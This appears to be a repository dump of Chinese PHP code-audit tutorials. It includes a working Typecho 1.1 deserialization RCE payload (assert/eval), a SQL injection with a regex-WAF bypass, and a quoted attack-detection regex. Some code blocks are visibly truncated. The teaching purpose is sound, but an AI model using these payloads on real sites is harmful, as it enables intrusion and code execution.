3 | PHP反序列化漏洞,在我们使用`unserialize()`进行反序列化的时候,如果反序列化对象中存在一些我们可以利用的魔法函数且传入的变量可控,那么这个过程就可能触发这个魔法函数,来执行我们想要的过程。
4 |
5 | # 0x01 初识反序列化
6 |
7 | 反序列化我们需要了解php的类和魔术方法,这里举个简单的例子用到的魔术方法是`__destruct` 销毁一个类之前执行执行析构方法。
8 |
9 | 
10 |
11 | 当对象创建后输出我们的`$a`变量的值。那么我们把它的值改变后用`serialize()`看看
12 |
13 | 
14 |
15 | `O:4:"test":1:{s:1:"a";s:5:"12345";}` 是我们序列化的值,然后`unserialize($_GET['id']);`传入我们改变的值 `O:4:"test":1:{s:1:"a";s:3:"404";}` 成功打印了我们的改变的值,因为反序列化我们可以控制类属性且这个过程会触发这些能够触发的魔术方法。
16 |
17 | 这里网上可以找到一些魔术方法,当然还有些可以绕过具体大家搜索一下我这里就不细写了,具体情况具体分析,反序列化难一点的还是需要很大的耐心才能完成。
18 |
19 | ```
20 | __wakeup() //使用unserialize时触发
21 | __sleep() //使用serialize时触发
22 | __destruct() //对象被销毁时触发
23 | __call() //在对象上下文中调用不可访问的方法时触发
24 | __callStatic() //在静态上下文中调用不可访问的方法时触发
25 | __get() //用于从不可访问的属性读取数据
26 | __set() //用于将数据写入不可访问的属性
27 | __isset() //在不可访问的属性上调用isset()或empty()触发
28 | __unset() //在不可访问的属性上使用unset()时触发
29 | __toString() //把类当作字符串使用时触发
30 | __invoke() //当脚本尝试将对象调用为函数时触发
31 |
32 | ```
33 |
34 |
35 | # 0x02 简单的一道题
36 |
37 | 下面我改了写一道简单的CTF,看看怎么利用它。
38 |
39 | ```
40 | varr->evaltest();
46 | }
47 | }
48 |
49 | class foo2{
50 | public $str;
51 | function evaltest(){
52 | eval($this->str);
53 | }
54 | }
55 | ?>
56 |
57 | ```
58 | 我们看到在foo2中`evaltest()`函数中存在eval,而foo1中调用了函数`evaltest()`,我们就想可不可以让foo1调用foo2中的`evaltest()`函数顺边还把它的`$str`中的值改写了。
59 |
60 | ```
61 | varr = new foo2();
66 | }
67 | }
68 |
69 | class foo2{
70 | public $str;
71 | function __construct(){
72 | $this->str = 'phpinfo();';
73 | }
74 | }
75 |
76 | $obj = new foo1();
77 | echo serialize($obj);
78 | ?>
79 | ```
80 | 我们把`$varr`变量赋值为`new foo2()` 然后它再去调用 `evaltest()`函数 然后我们把`$str`的值换成 我们想执行的命令。
81 |
82 | 
83 |
84 |
85 | # 0x03 实例审计
86 |
87 | 找了半天源码我觉得最有意义的,审计的最多的一次反序列化当属Typecho1.1版本的漏洞了。可能看起来有点吃力我尽量分析的详细一点。
88 |
89 | 来到文件 `install.php`
90 |
91 | 
92 |
93 | 我们看到要绕过`install.php`这个程序的`exit` 我们只需要传入的`finish`值不为空且`referer`为本站的值就能绕过。
94 |
95 | 我们来到核心部分
96 |
97 | 
98 |
99 | 这里调用`Typecho_Cookie`类的`get`方法 ,我这里就不跟进去了,就是获取cookies的`__typecho_config` 字段值,然后`base64_decode()`在进行反序例化赋值给变量`$config`,然后我们全局搜索下魔术方法`__destruct`之类的发现没有可以利用的点.
100 |
101 | 
102 |
103 | 然后我们跟进这个`Typecho_Db`类看看,他传入了`$config['adapter']` 和 `$config['prefix']`。
104 |
105 | var\Typecho\Db.php
106 |
107 | 
108 |
109 | 这里使用`.`连接`$adapterName`为一个类的话那么会触发`__toString()`这个魔术方法。
110 |
111 | 
112 |
113 | 然后全局搜索`__toString()`,来看看那里可以利,找到`\var\Typecho\Feed.php`。
114 |
115 | 
116 |
117 | 如果`$item['author']`是一个类且`screenName`是一个私有或者未定义的属性那么就会自动触发`__get()`
118 |
119 | 
120 |
121 | 那么我们就搜索看看那里有可以利用的`__get()`
122 |
123 | 在var\Typecho\Request.php 有这么一处
124 |
125 | 
126 |
127 | 我把跟进的代码都放在了一块,其中__get 调用了 `get()`函数,然后它又调用了`_applyFilter()`函数,其中还有可以造成命令执行的回调函数`call_user_func()`和`array_map()` 其中参数还可以控制,那么我的攻击链也算找完了,下面来梳理一下
128 |
129 |
130 | 攻击链:
131 |
132 | ```
133 | install.php
134 | |
135 | 绕过程序退出来到unserialize()
136 | |
137 | db.php中__construct() 触发__toString()
138 | |
139 | Feed.php中__toString触发__get()
140 | |
141 | request.php中__get()调用get()->_applyFilter()->回调函数
142 |
143 | ```
144 |
145 |
146 | 下面来构造exp,为了方便理解我们可以从尾到头来写
147 |
148 | 首先我们需要`_applyFilter`中的`$filter`的值为一个命令函数这里一般选择`assert()`,然后要让`get()`中的`$value`就是我们传入的命令也就是`_params['screenName']`,所以可以构造如下。
149 |
150 | ```
151 | class Typecho_Request
152 | {
153 | private $_params = array('screenName' =>'eval(\'phpinfo();exit();\')');
154 | private $_filter = array('assert');
155 |
156 | }
157 |
158 | ```
159 | `request.php`构造完了再构造`Feed.php`中需要的值,这里我们要进入`$item['author']->screenName`这个前面有个`self::RSS2 == $this->_type`语句 RSS2= RSS 2.0所以赋值对应的,这里的调用跟我前面写的那个CTF类似。
160 |
161 | ```
162 | class Typecho_Feed
163 | {
164 | private $_type = 'RSS 2.0';
165 | private $_items ;
166 |
167 | public function __construct (){
168 | $this->_items[] = array('author' => new Typecho_Request());
169 | }
170 | }
171 |
172 | ```
173 | 最后回到`install.php中` 看到`$db = new Typecho_Db($config['adapter'], $config['prefix']);` 触发`db.php`中的`__construct()`需要传入2个值,但是有个是默认的所以我们传入一个我们序列化的上面的值就可以了。
174 |
175 |
176 | payload :
177 |
178 | ```
179 | 'eval(\'phpinfo();exit();\')');
184 | private $_filter = array('assert');
185 |
186 | }
187 |
188 | class Typecho_Feed
189 | {
190 | private $_type = 'RSS 2.0';
191 | private $_items ;
192 |
193 | public function __construct (){
194 | $this->_items[] = array('author' => new Typecho_Request());
195 | }
196 | }
197 |
198 | $payload = array('adapter'=>new Typecho_Feed());
199 | echo base64_encode(serialize($payload));
200 | ?>
201 |
202 | ```
203 |
204 | 为什么这里payload `phpinfo();exit();`中有`exit()` ,因为程序开始使用了`ob_start()` 这个函数会把输出放进缓冲区,触发异常后`ob_end_clean()` 会清空缓冲区,导致没有回显。所以可以找到个函数来跳出或者执行后我们报错跳出又或者直接不要回显写入一句话。
205 |
206 | 
207 |
208 |
209 | 这类反序列化一般寻找起来还是很有难度的,个人感觉两头向中间来找方便一些,找到可以利用的入口,再到可以利用的函数,再从入口点想办法到利用点。
210 |
211 |
212 | # 0x04 文末
213 |
214 | 反序列化的地方还可以搭配注入 比如espcms的search.php注入。
--------------------------------------------------------------------------------
/2.0通读全文审计.md:
--------------------------------------------------------------------------------
1 | # 0x00 简介
2 |
3 | 通读全文推荐大家开始可以审计一些比较好看懂的CMS,我们先看大体网站框架,这里你大概知道什么文件夹是放什么类型的文件,然后从`index.php`文件开始往里面读,然后重点关注是否有全局过滤等等。
4 |
5 |
6 | # 0x01 实例审计
7 |
8 | 本文用到的源码是zzzphp,我们通过这个程序粗略的了解如何通读全文代码来审计,这里只做简单分析,不深入审计。
9 |
10 | ## 了解网站框架
11 |
12 | ```
13 | ├─admin //后台
14 | ├─config //配置文件
15 | ├─form //前台
16 | ├─images //图片
17 | ├─inc //包含文件
18 | ├─install //安装文件
19 | ├─js //js文件
20 | ├─plugins //插件
21 | ├─runtime //临时
22 | ├─search //搜索
23 | ├─template //模板
24 | ├─upload //上传文件夹
25 | └─wap //手机
26 |
27 | ```
28 |
29 | 首先我们看到这个结构,有一点审计基础或者会点英语应该都能看懂这些目录的意思,当然也有个别程序猿喜欢另类一点的命名规则,大体都是这样。
30 |
31 |
32 | ## 了解网站过滤与路由
33 |
34 | 我觉得全文通读不是无脑的去挨着读,这样比较浪费时间,我们一般应该先去读他的核心文件,一般都在包含文件夹里面,怎么去找核心文件一般是看文件名比如包含`main` `common`等等,也可以看看文件大小一般核心文件包含函数多文件相对较大,还可以通过入口文件一步一步去看,比如这里的核心文件就是`zzz_main.php`我们无非是先关注参数的获取、是否有全局过滤。
35 |
36 | 我们来到 `\inc\zzz_main.php`
37 |
38 | `getlocation()` 解析URL
39 |
40 | 
41 |
42 | `getform()`获取参数
43 |
44 | 
45 |
46 | 过滤函数`txt_html()` 但是通常有关过滤的函数包含一些字符`safe`之类 或者包含函数 `htmlspecialchars()` `addslashes()`
47 |
48 | 
49 |
50 | ## 了解系统DB类
51 |
52 | 除了这个文件我们还可以看看`mysql` `db` 之类的关键词文件,看看他数据库连接的方式是否存在宽字节注入的可能,还有他的连接方式。
53 |
54 | 
55 |
56 | ## 开始审计
57 |
58 | 看完这些我们就可以从`index.php`一层一层读了。
59 |
60 |
61 | 来到 `index.php` 直接包含文件`inc/zzz_client.php` 先判断`isinstall` 然后执行后面
62 |
63 | 
64 |
65 | 看到最后一句`ParseGlobal(G('sid'),G('cid'));` 这里调用了`ParseGlobal()` 函数我们可以跟进去看看。
66 |
67 | 进入if分支
68 |
69 | ```
70 | if ( $sid > 0 ) {
71 | $data = db_load_one( 'sort', 'sid=' . $sid );
72 |
73 | ```
74 |
75 | 跟进函数`db_load_one()` 这里会把传入的&替换为and
76 |
77 | 
78 |
79 | 跟进函数 `find_one()`
80 |
81 | 
82 |
83 | 这里我就不详细跟了只介绍思路,基本上确定这里如果传入的参数没过滤那么这里就会存在注入。
84 |
85 | 这里跟一下 `G()` 就会发现是`$GLOBALS[ 'sid' ]` 获取的,也就是前面解析url那里获取的值也没有过滤,那么这里基本上就是一个注入了。
86 |
87 | 读完这些文件我们就可以从各个功能文件夹的index读进去,比如这里我们来到`\search\index.php`
88 |
89 | ```
90 |
39 |
40 | ```
41 | 从index.php来看是GET获取P参数然后引用对应的文件,先来看看/inc/function/global.php
42 |
43 | ```
44 | set_error_handler("customError",E_ERROR);
45 | $getfilter="\\b(and|or)\\b.+?(>|<|=|in|like)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
46 | $postfilter="\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
47 | $cookiefilter="\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
48 |
49 | function StopAttack($StrFiltKey,$StrFiltValue,$ArrFiltReq){
50 | if(is_array($StrFiltValue))
51 | {
52 | $StrFiltValue=implode($StrFiltValue);
53 | }
54 | if (preg_match("/".$ArrFiltReq."/is",urldecode($StrFiltValue))){
55 | print "网址有误~";
56 | exit();
57 | }
58 | }
59 |
60 | foreach($_GET as $key=>$value){
61 | StopAttack($key,$value,$getfilter);
62 | }
63 | if ($_GET["p"]!=='admin'){
64 | foreach($_POST as $key=>$value){
65 | StopAttack($key,$value,$postfilter);
66 | }
67 | }
68 |
69 | foreach($_COOKIE as $key=>$value){
70 | StopAttack($key,$value,$cookiefilter);
71 | }
72 | unset($_GET['_SESSION']);
73 | unset($_POST['_SESSION']);
74 | unset($_COOKIE['_SESSION']);
75 |
76 | ```
77 |
78 | 这个正则貌似就是copy的360webscan的那个,这里GET、POST、COOKIE都被过滤了的,但是我们看到其中过滤POST的判断
79 |
80 | ```
81 | if ($_GET["p"]!=='admin'){
82 | foreach($_POST as $key=>$value){
83 | StopAttack($key,$value,$postfilter);
84 | }
85 | }
86 | ```
87 | 如果GET传入的p=admin了就不会进入这个if语句,也达到我们绕过的目的了,然后往下面看
88 |
89 | ```
90 | if (!empty($_GET)){ foreach($_GET AS $key => $value) $$key = addslashes_yec($value); }
91 | if (!empty($_POST)){ foreach($_POST AS $key => $value) $$key = addslashes_yec($value); }
92 |
93 | ```
94 | 这里我们传入的P参数的值被重新覆盖掉,然后经过`addslashes_yec`函数过滤。然后我们梳理一下审计思路
95 |
96 | ```
97 | 1. 寻找SERVER获取的。
98 | 2. 寻找数字型注入,结合上面的绕过,注入密码。
99 |
100 | ```
101 |
102 | 先看看前台注入,这个cms注入比较多,我就随便写个了
103 |
104 | \inc\module\cart.php
105 |
106 | ```
107 | elseif ($act == 'remove_goods') //移除商品
108 | {
109 | $ckey = $ckey ? intval($ckey) : intval($_COOKIE['ckey']);
110 | $gid_list = explode("@", $gid);
111 | $spec_list = explode("@", $spec);
112 |
113 | $db = dbc();
114 | $where ='';
115 | if($ckey != 0)
116 | {
117 | $where =' and cid='.$ckey;
118 | }
119 | elseif($ym_uid !=0)
120 | {
121 | $where =' and uid='.$ym_uid;
122 | }
123 | else {
124 | $res['err'] = '请刷新页面再试';
125 | die(json_encode_yec($res));
126 | }
127 |
128 | foreach ($gid_list as $k => $v) {
129 | $sp = $spec_list[$k];
130 | if(intval($v)<=0)
131 | {
132 | continue;
133 | }
134 |
135 | $db->query("delete i FROM ".$db->table('cart')." c join ".$db->table('cart_item')." i on c.id=i.cid where gid=".$v." and spec='".$sp."' ".$where);
136 | }
137 |
138 | $cnum = get_cart_amount(1);
139 | $res['res'] = $cnum;
140 | $time = time() + 15552000;
141 | set_cookie('cnum', $cnum, $time); //购物车数量
142 | die(json_encode_yec($res));
143 | }
144 |
145 | ```
146 |
147 | 其中传入的$gid经过`explode`函数分割(这里sql语句中不能使用@字符),然后foreach循环取出来后带入sql语句,也没有单双引号之类的包裹,比较明显的一处注入了。
148 |
149 | 
150 |
151 | 如果没用绕过是会触发360webscan的
152 |
153 | 
154 |
155 |
156 | # 0x02 文末
157 |
158 | 这套程序在1.2.4这里修复了这个逻辑方面的问题貌似漏洞就没啥了。本版本还有很多注入大家可以自己审计一下,也可以看看水泡泡巨佬的https://www.cnblogs.com/r00tuser/p/9014869.html
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # _代码审计_
2 |
3 | 公众号:404安全
4 |
5 | *待更新*
6 |
7 | 转载请声明出处
8 |
9 | ----------
10 |
11 | 代码审计感觉还是很重要的,这一块本人算是菜鸟,写本文也是为了总结一下知识,如果其中有什么错误,感谢提醒。
12 |
13 | ----------
14 |
15 | 总结了大概方向
16 |
17 | ```
18 | 基础代码审计
19 | |
20 | MVC结构审计
21 | |
22 | 框架审计
23 |
24 | ```
25 |
26 |
27 | ----------
28 |
29 | 本人撰写的文章,仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关。
30 |
--------------------------------------------------------------------------------
/img/1.2.1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.2.1.png
--------------------------------------------------------------------------------
/img/1.2.2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.2.2.png
--------------------------------------------------------------------------------
/img/1.2.3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.2.3.png
--------------------------------------------------------------------------------
/img/1.2.4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.2.4.png
--------------------------------------------------------------------------------
/img/1.2.5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.2.5.png
--------------------------------------------------------------------------------
/img/1.2.6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.2.6.png
--------------------------------------------------------------------------------
/img/1.2.7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.2.7.png
--------------------------------------------------------------------------------
/img/1.3.1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.3.1.png
--------------------------------------------------------------------------------
/img/1.3.2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.3.2.png
--------------------------------------------------------------------------------
/img/1.3.3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.3.3.png
--------------------------------------------------------------------------------
/img/1.3.4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.3.4.png
--------------------------------------------------------------------------------
/img/1.3.5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.3.5.png
--------------------------------------------------------------------------------
/img/1.4.1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.4.1.png
--------------------------------------------------------------------------------
/img/1.4.2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.4.2.png
--------------------------------------------------------------------------------
/img/1.4.3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.4.3.png
--------------------------------------------------------------------------------
/img/1.4.4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.4.4.png
--------------------------------------------------------------------------------
/img/1.4.5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.4.5.png
--------------------------------------------------------------------------------
/img/1.4.6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.4.6.png
--------------------------------------------------------------------------------
/img/1.4.7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.4.7.png
--------------------------------------------------------------------------------
/img/1.5.1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.5.1.png
--------------------------------------------------------------------------------
/img/1.5.10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.5.10.png
--------------------------------------------------------------------------------
/img/1.5.11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.5.11.png
--------------------------------------------------------------------------------
/img/1.5.12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.5.12.png
--------------------------------------------------------------------------------
/img/1.5.13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.5.13.png
--------------------------------------------------------------------------------
/img/1.5.14.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.5.14.png
--------------------------------------------------------------------------------
/img/1.5.15.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.5.15.png
--------------------------------------------------------------------------------
/img/1.5.16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.5.16.png
--------------------------------------------------------------------------------
/img/1.5.17.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.5.17.png
--------------------------------------------------------------------------------
/img/1.5.2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.5.2.png
--------------------------------------------------------------------------------
/img/1.5.3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.5.3.png
--------------------------------------------------------------------------------
/img/1.5.4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.5.4.png
--------------------------------------------------------------------------------
/img/1.5.5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.5.5.png
--------------------------------------------------------------------------------
/img/1.5.6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.5.6.png
--------------------------------------------------------------------------------
/img/1.5.7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.5.7.png
--------------------------------------------------------------------------------
/img/1.5.8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.5.8.png
--------------------------------------------------------------------------------
/img/1.5.9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.5.9.png
--------------------------------------------------------------------------------
/img/1.6.1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.6.1.png
--------------------------------------------------------------------------------
/img/1.6.2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.6.2.png
--------------------------------------------------------------------------------
/img/1.6.3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.6.3.png
--------------------------------------------------------------------------------
/img/1.6.4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.6.4.png
--------------------------------------------------------------------------------
/img/1.6.5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.6.5.png
--------------------------------------------------------------------------------
/img/1.6.6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.6.6.png
--------------------------------------------------------------------------------
/img/1.6.7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.6.7.png
--------------------------------------------------------------------------------
/img/1.7.1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.7.1.png
--------------------------------------------------------------------------------
/img/1.7.2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.7.2.png
--------------------------------------------------------------------------------
/img/1.7.3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.7.3.png
--------------------------------------------------------------------------------
/img/1.7.4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.7.4.png
--------------------------------------------------------------------------------
/img/1.7.5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.7.5.png
--------------------------------------------------------------------------------
/img/1.7.6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.7.6.png
--------------------------------------------------------------------------------
/img/1.8.1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.8.1.png
--------------------------------------------------------------------------------
/img/1.8.2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.8.2.png
--------------------------------------------------------------------------------
/img/1.8.3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.8.3.png
--------------------------------------------------------------------------------
/img/1.8.4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.8.4.png
--------------------------------------------------------------------------------
/img/1.8.5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.8.5.png
--------------------------------------------------------------------------------
/img/1.8.6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.8.6.png
--------------------------------------------------------------------------------
/img/1.8.7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.8.7.png
--------------------------------------------------------------------------------
/img/1.8.8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.8.8.png
--------------------------------------------------------------------------------
/img/1.9.1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.9.1.png
--------------------------------------------------------------------------------
/img/1.9.10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.9.10.png
--------------------------------------------------------------------------------
/img/1.9.11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.9.11.png
--------------------------------------------------------------------------------
/img/1.9.12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.9.12.png
--------------------------------------------------------------------------------
/img/1.9.2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.9.2.png
--------------------------------------------------------------------------------
/img/1.9.3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.9.3.png
--------------------------------------------------------------------------------
/img/1.9.4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.9.4.png
--------------------------------------------------------------------------------
/img/1.9.5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.9.5.png
--------------------------------------------------------------------------------
/img/1.9.6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.9.6.png
--------------------------------------------------------------------------------
/img/1.9.7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.9.7.png
--------------------------------------------------------------------------------
/img/1.9.8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.9.8.png
--------------------------------------------------------------------------------
/img/1.9.9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/1.9.9.png
--------------------------------------------------------------------------------
/img/2.0.0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aleenzz/php_bug_wiki/829f960efdbcf7220f5decfec04df2e287801bb0/img/2.0.0.png
--------------------------------------------------------------------------------
/img/2.0.1.png:
--------------------------------------------------------------------------------
